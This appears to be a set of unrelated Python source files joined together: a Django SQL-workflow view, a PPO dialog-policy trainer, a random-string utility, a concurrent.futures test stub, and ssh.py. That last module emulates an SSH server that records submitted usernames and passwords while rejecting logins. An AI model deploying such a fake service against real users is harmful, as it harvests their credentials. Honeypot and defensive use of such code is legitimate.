pctResult = {"status": -3, "msg": "进度未知", "data": {"percent": -100, "timeRemained": ""}}
elif dictSHA1 != {} and sqlID not in dictSHA1:
pctResult = {"status": 4, "msg": "该行SQL不是由pt-OSC执行的", "data": ""}
else:
pctResult = {"status": -2, "msg": "整个工单不由pt-OSC执行", "data": ""}
return HttpResponse(json.dumps(pctResult), content_type='application/json')
def getWorkflowStatus(request):
"""获取某个工单的当前状态"""
workflowId = request.POST['workflowid']
if workflowId == '' or workflowId is None:
context = {"status": -1, 'msg': 'workflowId参数为空.', "data": ""}
return HttpResponse(json.dumps(context), content_type='application/json')
workflowId = int(workflowId)
workflowDetail = get_object_or_404(SqlWorkflow, pk=workflowId)
workflowStatus = workflowDetail.status
result = {"status": workflowStatus, "msg": "", "data": ""}
return HttpResponse(json.dumps(result), content_type='application/json')
def stopOscProgress(request):
"""中止该SQL的pt-OSC进程"""
workflowId = request.POST['workflowid']
sqlID = request.POST['sqlID']
if workflowId == '' or workflowId is None or sqlID == '' or sqlID is None:
context = {"status": -1, 'msg': 'workflowId或sqlID参数为空.', "data": ""}
return HttpResponse(json.dumps(context), content_type='application/json')
user = request.user
workflowDetail = SqlWorkflow.objects.get(id=workflowId)
try:
reviewMan = json.loads(workflowDetail.audit_auth_groups)
except ValueError:
reviewMan = (workflowDetail.audit_auth_groups,)
# 服务器端二次验证,当前工单状态必须为等待人工审核,正在执行人工审核动作的当前登录用户必须为审核人. 避免攻击或被接口测试工具强行绕过
if workflowDetail.status != Const.workflowStatus['executing']:
context = {"status": -1, "msg": '当前工单状态不是"执行中",请刷新当前页面!', "data": ""}
return HttpResponse(json.dumps(context), content_type='application/json')
if user.username is None or user.username not in reviewMan:
context = {"status": -1, 'msg': '当前登录用户不是审核人,请重新登录.', "data": ""}
return HttpResponse(json.dumps(context), content_type='application/json')
workflowId = int(workflowId)
sqlID = int(sqlID)
if workflowId in sqlSHA1_cache:
dictSHA1 = sqlSHA1_cache[workflowId]
else:
dictSHA1 = getSqlSHA1(workflowId)
if dictSHA1 != {} and sqlID in dictSHA1:
sqlSHA1 = dictSHA1[sqlID]
try:
optResult = InceptionDao().stopOscProgress(sqlSHA1)
except Exception as msg:
logger.error(traceback.format_exc())
result = {'status': 1, 'msg': msg, 'data': ''}
return HttpResponse(json.dumps(result), content_type='application/json')
else:
optResult = {"status": 4, "msg": "不是由pt-OSC执行的", "data": ""}
return HttpResponse(json.dumps(optResult), content_type='application/json')
|
vanilla_ppo.py | # -*- coding: utf-8 -*-
import os
import numpy as np
import logging
import pickle
import torch
import torch.nn as nn
from torch import optim
from torch import multiprocessing as mp
from rlmodule import MultiDiscretePolicy, Value, Memory, UserAction2, VanillaTransition
# from estimator import RewardEstimator
from utils import state_vectorize, to_device, usr_state_vectorize
from metrics import Evaluator
# from copy import deepcopy
import random
from world_model import WorldModel
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def sampler(pid, queue, evt, env, policy, batchsz):
"""
This is a sampler function, and it will be called by multiprocess.Process to sample data from environment by multiple
processes.
:param pid: process id
:param queue: multiprocessing.Queue, to collect sampled data
:param evt: multiprocessing.Event, to keep the process alive
:param env: environment instance
:param policy: policy network, to generate action from current policy
:param batchsz: total sampled items
:return:
"""
buff = Memory(VanillaTransition)
user_buff = Memory(UserAction2)
# we need to sample batchsz of (state, action, next_state, reward, mask)
# each trajectory contains `trajectory_len` num of items, so we only need to sample
# `batchsz//trajectory_len` num of trajectory totally
# the final sampled number may be larger than batchsz.
sampled_num = 0
sampled_traj_num = 0
traj_len = 40
real_traj_len = 0
while sampled_num < batchsz:
# for each trajectory, we reset the env and get initial state
s = env.reset()
for t in range(traj_len):
# [s_dim] => [a_dim]
s_vec = torch.Tensor(state_vectorize(s, env.cfg, env.db))
a = policy.select_action(s_vec.to(device=DEVICE)).cpu()
# interact with env
next_s, done, info = env.step(s, a)
# a flag indicates ending or not
mask = 0 if done else 1
# manual reward calculations
reward = env.get_reward()
# get reward compared to demonstrations
next_s_vec = torch.Tensor(state_vectorize(next_s, env.cfg, env.db))
# save to queue
buff.push(s_vec.numpy(), a.numpy(), reward, mask, next_s_vec.numpy())
user_state_vec = usr_state_vectorize(info['wm_state']['user_goal'],
list(info['wm_state']['history']['sys'].keys()) +
list(info['wm_state']['sys_action'].keys()),
env.cfg)
user_buff.push(info['wm_state'], user_state_vec, info['wm_usr_a_vec'].numpy(), info['wm_usr_terminal'],
env.goal, env.agenda)
# update per step
s = next_s
real_traj_len = t
if done:
break
# this is end of one trajectory
sampled_num += real_traj_len
sampled_traj_num += 1
# t indicates the valid trajectory length
# this is end of sampling all batchsz of items.
# when sampling is over, push all buff data into queue
queue.put([pid, buff, user_buff])
evt.wait()
class PPO(object):
def __init__(self, env_cls, args, manager, cfg, process_num, pre=False, pre_irl=False,
infer=False):
"""
:param env_cls: env class or function, not instance, as we need to create several instance in class.
:param args:
:param manager:
:param cfg:
:param process_num: process number
:param pre: set to pretrain mode
:param infer: set to test mode
"""
self.ratio = args.sim_ratio
self.model_horizon = args.model_horizon
self.process_num = process_num
# initialize envs for each process
self.env_list = []
for _ in range(process_num):
self.env_list.append(env_cls())
# construct policy and value network
self.policy = MultiDiscretePolicy(cfg).to(device=DEVICE)
self.value = Value(cfg).to(device=DEVICE)
if pre:
self.print_per_batch = args.print_per_batch
from dbquery import DBQuery
db = DBQuery(args.data_dir)
self.data_train = manager.create_dataset_rl('train', args.batchsz, cfg, db)
self.data_valid = manager.create_dataset_rl('valid', args.batchsz, cfg, db)
self.data_test = manager.create_dataset_rl('test', args.batchsz, cfg, db)
self.multi_entropy_loss = nn.MultiLabelSoftMarginLoss()
else:
# self.rewarder = RewardEstimator(args, manager, cfg, pretrain=pre_irl, inference=infer)
self.evaluator = Evaluator(args.data_dir, cfg)
self.world_model = WorldModel(args, cfg, manager)
self.save_dir = args.save_dir
self.save_per_epoch = args.save_per_epoch
self.optim_batchsz = args.batchsz
self.update_round = args.update_round
self.policy.eval()
self.value.eval()
self.gamma = args.gamma
self.epsilon = args.epsilon
self.tau = args.tau
self.policy_optim = optim.RMSprop(self.policy.parameters(), lr=args.lr_rl)
self.value_optim = optim.Adam(self.value.parameters(), lr=args.lr_rl)
def policy_loop(self, data):
s, target_a = to_device(data)
a_weights = self.policy(s)
loss_a = self.multi_entropy_loss(a_weights, target_a)
return loss_a
def imitating(self, epoch):
"""
pretrain the policy by simple imitation learning (behavioral cloning)
"""
self.policy.train()
a_loss = 0.
for i, data in enumerate(self.data_train):
self.policy_optim.zero_grad()
loss_a = self.policy_loop(data)
a_loss += loss_a.item()
loss_a.backward()
self.policy_optim.step()
if (i + 1) % self.print_per_batch == 0:
a_loss /= self.print_per_batch
logging.debug('<<dialog policy>> epoch {}, iter {}, loss_a:{}'.format(epoch, i, a_loss))
a_loss = 0.
if (epoch + 1) % self.save_per_epoch == 0:
self.save(self.save_dir, epoch, True)
self.policy.eval()
def imit_test(self, epoch, best):
"""
provide an unbiased evaluation of the policy fit on the training dataset
"""
a_loss = 0.
for i, data in enumerate(self.data_valid):
loss_a = self.policy_loop(data)
a_loss += loss_a.item()
a_loss /= len(self.data_valid)
logging.debug('<<dialog policy>> validation, epoch {}, loss_a:{}'.format(epoch, a_loss))
if a_loss < best:
logging.info('<<dialog policy>> best model saved')
best = a_loss
self.save(self.save_dir, 'best', True)
a_loss = 0.
for i, data in enumerate(self.data_test):
loss_a = self.policy_loop(data)
a_loss += loss_a.item()
a_loss /= len(self.data_test)
logging.debug('<<dialog policy>> test, epoch {}, loss_a:{}'.format(epoch, a_loss))
return best
"""
def imit_value(self, epoch, batchsz, best):
self.value.train()
batch, _ = self.sample(batchsz)
s = torch.from_numpy(np.stack(batch.state)).to(device=DEVICE)
a = torch.from_numpy(np.stack(batch.action)).to(device=DEVICE)
next_s = torch.from_numpy(np.stack(batch.next_state)).to(device=DEVICE)
mask = torch.Tensor(np.stack(batch.mask)).to(device=DEVICE)
batchsz = s.size(0)
v = self.value(s).squeeze(-1).detach()
log_pi_old_sa = self.policy.get_log_prob(s, a).detach()
# r = self.rewarder.estimate(s, a, next_s, log_pi_old_sa).detach()
# TODO: handle reward here
A_sa, v_target = self.est_adv(r, v, mask)
value_loss = 0.
for i in range(self.update_round):
perm = torch.randperm(batchsz)
v_target_shuf, s_shuf = v_target[perm], s[perm]
optim_chunk_num = int(np.ceil(batchsz / self.optim_batchsz))
v_target_shuf, s_shuf = torch.chunk(v_target_shuf, optim_chunk_num), torch.chunk(s_shuf, optim_chunk_num)
value_loss = 0.
for v_target_b, s_b in zip(v_target_shuf, s_shuf):
self.value_optim.zero_grad()
v_b = self.value(s_b).squeeze(-1)
loss = (v_b - v_target_b).pow(2).mean()
value_loss += loss.item()
loss.backward()
self.value_optim.step()
value_loss /= optim_chunk_num
logging.debug('<<dialog policy>> epoch {}, iteration {}, loss {}'.format(epoch, i, value_loss))
if value_loss < best:
logging.info('<<dialog policy>> best model saved')
best = value_loss
self.save(self.save_dir, 'best', True)
if (epoch + 1) % self.save_per_epoch == 0:
self.save(self.save_dir, epoch, True)
self.value.eval()
return best
"""
"""
def train_irl(self, epoch, batchsz):
batch, _ = self.sample(batchsz)
self.rewarder.train_irl(batch, epoch)
def test_irl(self, epoch, batchsz, best):
batch, _ = self.sample(batchsz)
best = self.rewarder.test_irl(batch, epoch, best)
return best
"""
@staticmethod
def _prepare_world_model_data(user_batch):
user_state_vec = torch.from_numpy(np.stack(user_batch.state_vec)).float().to(DEVICE)
user_act_vec = torch.from_numpy(np.stack(user_batch.action_vec)).float().to(DEVICE)
user_terminal_vec = torch.from_numpy(np.stack(user_batch.terminal)).unsqueeze(-1).float().to(DEVICE)
return [user_state_vec, user_act_vec, user_terminal_vec]
def train_world_model(self, epoch, batchsz):
_, batch = self.sample(batchsz)
self.world_model.train(self._prepare_world_model_data(batch), epoch)
def test_world_model(self, epoch, batchsz, best):
_, batch = self.sample(batchsz)
best = self.world_model.test(self._prepare_world_model_data(batch), epoch, best)
return best
def est_adv(self, r, v, mask):
"""
we save a trajectory in continuous space and it reaches the ending of current trajectory when mask=0.
:param r: reward, Tensor, [b]
:param v: estimated value, Tensor, [b]
:param mask: indicates ending for 0 otherwise 1, Tensor, [b]
:return: A(s, a), V-target(s), both Tensor
"""
batchsz = v.size(0)
# v_target is worked out by Bellman equation.
v_target = torch.Tensor(batchsz).to(device=DEVICE)
delta = torch.Tensor(batchsz).to(device=DEVICE)
A_sa = torch.Tensor(batchsz).to(device=DEVICE)
prev_v_target = 0
prev_v = 0
prev_A_sa = 0
for t in reversed(range(batchsz)):
# mask here indicates a end of trajectory
# this value will be treated as the target value of value network.
# mask = 0 means the immediate reward is the real V(s) since it's end of trajectory.
# formula: V(s_t) = r_t + gamma * V(s_t+1)
v_target[t] = r[t] + self.gamma * prev_v_target * mask[t]
# please refer to : https://arxiv.org/abs/1506.02438
# for generalized adavantage estimation
# formula: delta(s_t) = r_t + gamma * V(s_t+1) - V(s_t)
delta[t] = r[t] + self.gamma * prev_v * mask[t] - v[t]
# formula: A(s, a) = delta(s_t) + gamma * lamda * A(s_t+1, a_t+1)
# here use symbol tau as lambda, but original paper uses symbol lambda.
A_sa[t] = delta[t] + self.gamma * self.tau * prev_A_sa * mask[t]
# update previous
prev_v_target = v_target[t]
prev_v = v[t]
prev_A_sa = A_sa[t]
# normalize A_sa
A_sa = (A_sa - A_sa.mean()) / A_sa.std()
return A_sa, v_target
def update(self, batchsz, epoch, best=None):
"""
firstly sample batchsz items and then perform optimize algorithms.
:param batchsz:
:param epoch:
:param best:
:return:
"""
backward = True if best is None else False
if backward:
self.policy.train()
self.value.train()
# 1. sample data asynchronously
real_batch, user_batch = self.sample(batchsz)
# data in batch is : batch.state: ([1, s_dim], [1, s_dim]...)
# batch.action: ([1, a_dim], [1, a_dim]...)
# batch.reward/ batch.mask: ([1], [1]...)
real_s, real_a, real_r, real_mask, real_next_s = [torch.from_numpy(np.stack(item)).to(device=DEVICE) for item in
real_batch]
real_batchsz = real_s.size(0)
# 2. update reward estimator
# real_inputs = (real_s, real_a, real_next_s)
# if backward:
# self.rewarder.update_irl(real_inputs, real_batchsz, epoch)
# else:
# best[1] = self.rewarder.update_irl(real_inputs, real_batchsz, epoch, best[1])
# update the world model
if backward:
self.world_model.train(self._prepare_world_model_data(user_batch), epoch)
else:
best[3] = self.world_model.test(self._prepare_world_model_data(user_batch), epoch, best[3])
# merge real trajectory and simulated trajectory
if backward and self.ratio > 0.0:
# sample with the world model
# I-SEE
sim_batch = self.sample_with_wm(int(np.ceil(batchsz * self.ratio)), user_batch)
# DDQ style
# sim_batch = self.sample_with_wm_complete(int(np.ceil(batchsz * self.ratio)))
s, a, r, mask, next_s = [torch.from_numpy(np.stack(real_traj + sim_traj)).to(device=DEVICE)
for real_traj, sim_traj in zip(real_batch, sim_batch)]
batchsz = s.size(0)
else:
s, a, r, mask, next_s = real_s, real_a, real_r, real_mask, real_next_s
batchsz = real_batchsz
# 3. get estimated V(s) and PI_old(s, a)
# actually, PI_old(s, a) can be saved when interacting with env, so as to save the time of one forward elapsed
# v: [b, 1] => [b]
v = self.value(s).squeeze(-1).detach()
log_pi_old_sa = self.policy.get_log_prob(s, a).detach()
A_sa, v_target = self.est_adv(r, v, mask)
if backward:
logging.debug('<<dialog policy>> epoch {}, reward {}'.format(epoch, r.mean().item()))
else:
reward = r.mean().item()
logging.debug('<<dialog policy>> validation, epoch {}, reward {}'.format(epoch, reward))
if reward > best[2]:
logging.info('<<dialog policy>> best model saved')
best[2] = reward
self.save(self.save_dir, 'best', True)
with open(self.save_dir + '/best.pkl', 'wb') as f:
pickle.dump(best, f)
return best
# 5. update dialog policy
for i in range(self.update_round):
# 1. shuffle current batch
perm = torch.randperm(batchsz)
# shuffle the variable for mutliple optimize
v_target_shuf, A_sa_shuf, s_shuf, a_shuf, log_pi_old_sa_shuf = v_target[perm], A_sa[perm], s[perm], a[perm], \
log_pi_old_sa[perm]
# 2. get mini-batch for optimizing
optim_chunk_num = int(np.ceil(batchsz / self.optim_batchsz))
# chunk the optim_batch for total batch
v_target_shuf, A_sa_shuf, s_shuf, a_shuf, log_pi_old_sa_shuf = torch.chunk(v_target_shuf, optim_chunk_num), \
torch.chunk(A_sa_shuf, optim_chunk_num), \
torch.chunk(s_shuf, optim_chunk_num), \
torch.chunk(a_shuf, optim_chunk_num), \
torch.chunk(log_pi_old_sa_shuf,
optim_chunk_num)
# 3. iterate all mini-batch to optimize
policy_loss, value_loss = 0., 0.
for v_target_b, A_sa_b, s_b, a_b, log_pi_old_sa_b in zip(v_target_shuf, A_sa_shuf, s_shuf, a_shuf,
log_pi_old_sa_shuf):
# print('optim:', batchsz, v_target_b.size(), A_sa_b.size(), s_b.size(), a_b.size(), log_pi_old_sa_b.size())
# 1. update value network
self.value_optim.zero_grad()
v_b = self.value(s_b).squeeze(-1)
loss = (v_b - v_target_b).pow(2).mean()
value_loss += loss.item()
# backprop
loss.backward()
# nn.utils.clip_grad_norm(self.value.parameters(), 4)
self.value_optim.step()
# 2. update policy network by clipping
self.policy_optim.zero_grad()
# [b, 1]
log_pi_sa = self.policy.get_log_prob(s_b, a_b)
# ratio = exp(log_Pi(a|s) - log_Pi_old(a|s)) = Pi(a|s) / Pi_old(a|s)
# we use log_pi for stability of numerical operation
# [b, 1] => [b]
ratio = (log_pi_sa - log_pi_old_sa_b).exp().squeeze(-1)
surrogate1 = ratio * A_sa_b
surrogate2 = torch.clamp(ratio, 1 - self.epsilon, 1 + self.epsilon) * A_sa_b
# this is element-wise comparing.
# we add negative symbol to convert gradient ascent to gradient descent
surrogate = - torch.min(surrogate1, surrogate2).mean()
policy_loss += surrogate.item()
# backprop
surrogate.backward()
# gradient clipping, for stability
torch.nn.utils.clip_grad_norm_(self.policy.parameters(), 10)
# self.lock.acquire() # retain lock to update weights
self.policy_optim.step()
# self.lock.release() # release lock
value_loss /= optim_chunk_num
policy_loss /= optim_chunk_num
logging.debug('<<dialog policy>> epoch {}, iteration {}, value, loss {}'.format(epoch, i, value_loss))
logging.debug('<<dialog policy>> epoch {}, iteration {}, policy, loss {}'.format(epoch, i, policy_loss))
if (epoch + 1) % self.save_per_epoch == 0:
self.save(self.save_dir, epoch)
with open(self.save_dir + '/' + str(epoch) + '.pkl', 'wb') as f:
pickle.dump(best, f)
self.policy.eval()
self.value.eval()
def sample_with_wm(self, batchsz, user_batch):
user_batchsz = len(user_batch.state_comp)
sampled_num = 0
# traj_len = 40
buff = Memory(VanillaTransition)
while sampled_num < batchsz:
# sample a state from the user batch
index = random.choice(range(user_batchsz))
state, state_vec, user_act_vec, terminal, goal, agenda = \
user_batch.state_comp[index], user_batch.state_vec[index], \
user_batch.action_vec[index], user_batch.terminal[index], user_batch.goal[index], user_batch.agenda[
index]
if terminal:
continue
self.world_model.set_goal_agenda(goal, agenda)
s = self.world_model.set_state(state, torch.from_numpy(user_act_vec), terminal)
self.world_model.pick_one(random.choice(range(self.world_model.ensemble_size)))
for t in range(self.model_horizon):
# [s_dim] => [a_dim]
s_vec = torch.Tensor(state_vectorize(s, self.world_model.cfg, self.world_model.db))
a = self.policy.select_action(s_vec.to(device=DEVICE)).cpu()
# interact with env
next_s, done, info = self.world_model.step(s, a)
r = self.world_model.get_reward()
sampled_num += 1
# a flag indicates ending or not
mask = 0 if done or (t == (self.model_horizon - 1)) else 1
# get reward compared to demonstrations
next_s_vec = torch.Tensor(state_vectorize(next_s, self.world_model.cfg, self.world_model.db))
# save to queue
buff.push(s_vec.numpy(), a.numpy(), r, mask, next_s_vec.numpy())
s = next_s
if done:
break
self.world_model.pick_one(None)
return buff.get_batch()
def sample_with_wm_complete(self, batchsz):
sampled_num = 0
sampled_traj_num = 0
traj_len = 40
buff = Memory(VanillaTransition)
while sampled_num < batchsz:
s = self.world_model.reset()
self.world_model.pick_one(random.choice(range(self.world_model.ensemble_size)))
for t in range(traj_len):
s_vec = torch.Tensor(state_vectorize(s, self.world_model.cfg, self.world_model.db))
a = self.policy.select_action(s_vec.to(device=DEVICE)).cpu()
# interact with env
next_s, done, info = self.world_model.step(s, a)
r = self.world_model.get_reward()
sampled_num += 1
# a flag indicates ending or not
mask = 0 if done or (t == (self.model_horizon - 1)) else 1
# get reward compared to demonstrations
next_s_vec = torch.Tensor(state_vectorize(next_s, self.world_model.cfg, self.world_model.db))
# save to queue
buff.push(s_vec.numpy(), a.numpy(), r, mask, next_s_vec.numpy())
# update per step
s = next_s
if done:
break
# this is end of one trajectory
sampled_traj_num += 1
self.world_model.pick_one(None)
return buff.get_batch()
def sample(self, batchsz):
"""
Given batchsz number of task, the batchsz will be splited equally to each processes
and when processes return, it merge all data and return
:param batchsz:
:return: batch
"""
# batchsz will be splitted into each process,
# final batchsz maybe larger than batchsz parameters
process_batchsz = np.ceil(batchsz / self.process_num).astype(np.int32)
# buffer to save all data
queue = mp.Queue()
# start processes for pid in range(1, processnum)
# if processnum = 1, this part will be ignored.
# when save tensor in Queue, the process should keep alive till Queue.get(),
# please refer to : https://discuss.pytorch.org/t/using-torch-tensor-over-multiprocessing-queue-process-fails/2847
# however still some problem on CUDA tensors on multiprocessing queue,
# please refer to : https://discuss.pytorch.org/t/cuda-tensors-on-multiprocessing-queue/28626
# so just transform tensors into numpy, then put them into queue.
evt = mp.Event()
processes = []
for i in range(self.process_num):
process_args = (i, queue, evt, self.env_list[i], self.policy, process_batchsz)
processes.append(mp.Process(target=sampler, args=process_args))
for p in processes:
# set the process as daemon, and it will be killed once the main process is stoped.
p.daemon = True
p.start()
# we need to get the first Memory object and then merge others Memory use its append function.
pid0, buff0, user_buff0 = queue.get()
for _ in range(1, self.process_num):
pid, buff_, user_buff_ = queue.get()
buff0.append(buff_) # merge current Memory into buff0
user_buff0.append(user_buff_)
evt.set()
# now buff saves all the sampled data
buff = buff0
user_buff = user_buff0
return buff.get_batch(), user_buff.get_batch()
def evaluate(self):
env = self.env_list[0]
traj_len = 40
reward_tot, turn_tot, inform_tot, match_tot, success_tot = [], [], [], [], []
for seed in range(1000):
s = env.reset(seed)
print('seed', seed)
print('goal', env.goal.domain_goals)
print('usr', s['user_action'])
turn = traj_len
reward = []
value = []
mask = []
for t in range(traj_len):
s_vec = torch.Tensor(state_vectorize(s, env.cfg, env.db)).to(device=DEVICE)
# mode with policy during evaluation
a = self.policy.select_action(s_vec, False)
next_s, done, _ = env.step(s, a.cpu())
next_s_vec = torch.Tensor(state_vectorize(next_s, env.cfg, env.db)).to(device=DEVICE)
log_pi = self.policy.get_log_prob(s_vec, a)
# r = self.rewarder.estimate(s_vec, a, next_s_vec, log_pi)
r = env.get_reward()
v = self.value(s_vec).squeeze(-1)
# reward.append(r.item())
reward.append(r)
value.append(v.item())
s = next_s
print('sys', s['last_sys_action'])
print('usr', s['user_action'])
if done:
mask.append(0)
turn = t + 2 # one due to counting from 0, the one for the last turn
break
mask.append(1)
reward_tot.append(np.mean(reward))
turn_tot.append(turn)
match_tot += self.evaluator.match_rate(s)
inform_tot.append(self.evaluator.inform_F1(s))
reward = torch.Tensor(reward)
value = torch.Tensor(value)
mask = torch.LongTensor(mask)
A_sa, v_target = self.est_adv(reward, value, mask)
print('turn', turn)
# print('reward', A_sa.tolist())
print('reward', v_target[0].item())
match_session = self.evaluator.match_rate(s, True)
print('match', match_session)
inform_session = self.evaluator.inform_F1(s, True)
print('inform', inform_session)
if (match_session == 1 and inform_session[1] == 1) \
or (match_session == 1 and inform_session[1] is None) \
or (match_session is None and inform_session[1] == 1):
print('success', 1)
success_tot.append(1)
else:
print('success', 0)
success_tot.append(0)
logging.info('reward {}'.format(np.mean(reward_tot)))
logging.info('turn {}'.format(np.mean(turn_tot)))
logging.info('match {}'.format(np.mean(match_tot)))
TP, FP, FN = np.sum(inform_tot, 0)
prec = TP / (TP + FP)
rec = TP / (TP + FN)
F1 = 2 * prec * rec / (prec + rec)
logging.info('inform rec {}, F1 {}'.format(rec, F1))
logging.info('success {}'.format(np.mean(success_tot)))
def save(self, directory, epoch, rl_only=False):
if not os.path.exists(directory):
os.makedirs(directory)
""""
if not rl_only:
self.rewarder.save_irl(directory, epoch)
"""
torch.save(self.value.state_dict(), directory + '/' + str(epoch) + '_ppo.val.mdl')
torch.save(self.policy.state_dict(), directory + '/' + str(epoch) + '_ppo.pol.mdl')
logging.info('<<dialog policy>> epoch {}: saved network to mdl'.format(epoch))
def load(self, filename):
# self.rewarder.load_irl(filename)
for idx in range(self.world_model.ensemble_size):
self.world_model.pick_one(idx)
self.world_model.load(filename)
self.world_model.pick_one(None)
value_mdl = filename + '_ppo.val.mdl'
policy_mdl = filename + '_ppo.pol.mdl'
if os.path.exists(value_mdl):
self.value.load_state_dict(torch.load(value_mdl))
logging.info('<<dialog policy>> loaded checkpoint from file: {}'.format(value_mdl))
if os.path.exists(policy_mdl):
self.policy.load_state_dict(torch.load(policy_mdl))
logging.info('<<dialog policy>> loaded checkpoint from file: {}'.format(policy_mdl))
best_pkl = filename + '.pkl'
if os.path.exists(best_pkl):
with open(best_pkl, 'rb') as f:
best = pickle.load(f)
else:
best = [float('inf'), float('inf'), float('-inf'),
{'pi': [float('inf')] * self.world_model.ensemble_size,
'done': [float('inf')] * self.world_model.ensemble_size}]
return best
"""
def sample_w_world_model(self, batchsz):
sampled_num = 0
sampled_traj_num = 0
traj_len = 40
real_traj_len = 0
model_horizon = 5
env = self.env_list[0]
real_buff = Memory(VanillaTransition)
sim_buff = Memory(VanillaTransition)
while sampled_num < batchsz:
s = env.reset()
for t in range(traj_len):
# [s_dim] => [a_dim]
s_vec = torch.Tensor(state_vectorize(s, env.cfg, env.db))
a = self.policy.select_action(s_vec.to(device=DEVICE)).cpu()
# interact with env
next_s, done = env.step(s, a)
# a flag indicates ending or not
mask = 0 if done or (t == (traj_len - 1)) else 1
# get reward compared to demostrations
next_s_vec = torch.Tensor(state_vectorize(next_s, env.cfg, env.db))
# save to queue
real_buff.push(s_vec.numpy(), a.numpy(), mask, next_s_vec.numpy())
if done:
break
real_next_s = deepcopy(next_s)
# world model takes control
for idx in range(self.world_model.ensemble_size):
s = deepcopy(real_next_s)
self.world_model.pick_one(idx)
self.world_model.take_over(env.goal)
for sim_t in range(model_horizon):
s_vec = torch.Tensor(state_vectorize(s, self.world_model.cfg, self.world_model.db))
a = self.policy.select_action(s_vec.to(device=DEVICE)).cpu()
# interact with world model
next_s, done = self.world_model.step(s, a)
# a flag indicates ending or not
mask = 0 if done or (sim_t == (model_horizon - 1)) else 1
# get reward compared to demostrations
next_s_vec = torch.Tensor(state_vectorize(next_s, self.world_model.cfg, self.world_model.db))
# save to queue
sim_buff.push(s_vec.numpy(), a.numpy(), mask, next_s_vec.numpy())
self.world_model.pick_one(None)
next_s = real_next_s
# update per step
s = next_s
real_traj_len = t
# this is end of one trajectory
sampled_num += real_traj_len
sampled_traj_num += 1
print("{}/{}".format(sampled_num, batchsz))
return real_buff.get_batch(), sim_buff.get_batch()
"""
|
ssh.py | import util
import os
import socket
import paramiko
from threading import Thread
from service import Service
from time import sleep
from stubssh import SSHStub, SSHHandler
from zoption import Zoption
class ssh(Service):
def __init__(self):
super(ssh, self).__init__('SSH Server')
self.config['port'].value = 22
self.config.update({"priv_key":Zoption(type = "str",
value = None,
required = False,
display = "Private key (None to generate)")
})
self.info = """
Emulate a basic SSH service; stores usernames/passwords
but rejects requests.
"""
def cleanup(self):
""" If we weren't given a private key, remove the temp we generated
"""
if self.config['priv_key'].value == './privkey.key':
os.system('rm -f privkey.key')
def initialize_bg(self):
if self.config['priv_key'].value is not None:
paramiko.RSAKey.from_private_key_file( \
self.config['priv_key'].value)
util.Msg('Initializing SSH server...')
thread = Thread(target=self.initialize)
thread.start()
sleep(1)
if self.running:
return True
else:
return False
def initialize(self):
priv_key = self.config['priv_key'].value
try:
# try importing here so we can catch it right away
import paramiko
except ImportError:
util.Error('Paramiko libraries required for this module.')
return
level = getattr(paramiko.common, 'CRITICAL')
paramiko.common.logging.basicConfig(level=level)
# if the user did not specify a key, generate one
if priv_key is None:
if not util.check_program('openssl'):
util.Error('OpenSSL required to generate cert/key files.')
return
if not util.does_file_exist('./privkey.key'):
util.debug('Generating RSA private key...')
util.init_app('openssl genrsa -out privkey.key 2048')
util.debug('privkey.key was generated.')
priv_key = self.config['priv_key'].value = './privkey.key'
try:
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
server_socket.settimeout(3)
server_socket.bind(('0.0.0.0', self.config['port'].value))
server_socket.listen(1)
self.running = True
while self.running:
try:
con, addr = server_socket.accept()
except KeyboardInterrupt:
return
except:
# timeout
continue
pkey = paramiko.RSAKey.from_private_key_file(priv_key)
transport = paramiko.Transport(con)
transport.add_server_key(pkey)
transport.set_subsystem_handler('handler', paramiko.SFTPServer, SSHHandler)
context = {'dump': self.dump, 'log_data': self.log_data,
'log_file': self.log_file}
server = SSHStub(context)
try:
transport.start_server(server=server)
transport.accept()
while transport.is_active():
sleep(1)
except socket.error as j:
if j.errno == 104:
# just means we've got a broken pipe, or
# the peer dropped unexpectedly
continue
else:
raise Exception()
except IOError:
util.Error('There was an error reading the keyfile.')
return False
except EOFError:
# thrown when we dont get the key correctly, or
# remote host gets mad because the key changed
continue
except:
raise Exception()
except KeyboardInterrupt:
pass
except Exception as j:
util.Error('Error with server: %s' % j)
finally:
self.running = False
self.cleanup()
def cli(self, parser):
""" initialize CLI options
"""
parser.add_argument('--ssh', help='SSH Server', action='store_true',
default=False, dest=self.which)
|
utils.py | from .repo import ProcessError
from threading import Thread
# Use the system PRNG if possible
import hashlib, random, time
try:
r = random.SystemRandom()
r.getstate()
random = r
using_sysrandom = True
except NotImplementedError:
using_sysrandom = False
def get_random_string(length=12, allowed_chars='abcdefghijklmnopqrstuvwxyz'
'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'):
"""
Returns a securely generated random string.
The default length of 12 with the a-z, A-Z, 0-9 character set returns
a 71-bit value. log_2((26+26+10)^12) =~ 71 bits
"""
return ''.join([random.choice(allowed_chars) for i in range(length)])
def get_secure_random_string(*args, **kwargs):
if not using_sysrandom:
# This is ugly, and a hack, but it makes things better than
# the alternative of predictability. This re-seeds the PRNG
# using a value that is hard for an attacker to predict, every
# time a random string is required. This may change the
# properties of the chosen random sequence slightly, but this
# is better than absolute predictability.
random.seed(hashlib.sha256("%s%s%s" %
(random.getstate(), time.time(), __file__)).digest())
return get_random_string(*args, **kwargs)
class AsyncResult(object):
def __init__(self, func, args=(), kwargs=None):
if kwargs is None:
kwargs = {}
self.func = func
self.thread = Thread(target=self.run, args=args, kwargs=kwargs)
self.thread.start()
def run(self, *args, **kwargs):
try:
self.result = self.func(*args, **kwargs)
except ProcessError as e:
self.result = e
def do(self):
self.thread.join()
return self.result
def with_lock(func, lock):
def wrapper(*args, **kwargs):
with lock:
return func(*args, **kwargs)
return wrapper
|
test_concurrent_futures.py | from __future__ import print_function
import test.test_support as test_support
# Skip tests if _multiprocessing wasn't built.
test_support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test_support.import_module('multiprocessing.synchronize')
multiprocessing = test_support.import_module('multiprocessing')
# import threading after _multiprocessing to raise a more revelant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
test_support.import_module('threading')
from test.script_helper import assert_python_ok
import os
import sys
import threading
import time
import unittest
import weakref
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future)
from concurrent.futures.process import BrokenProcessPool
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
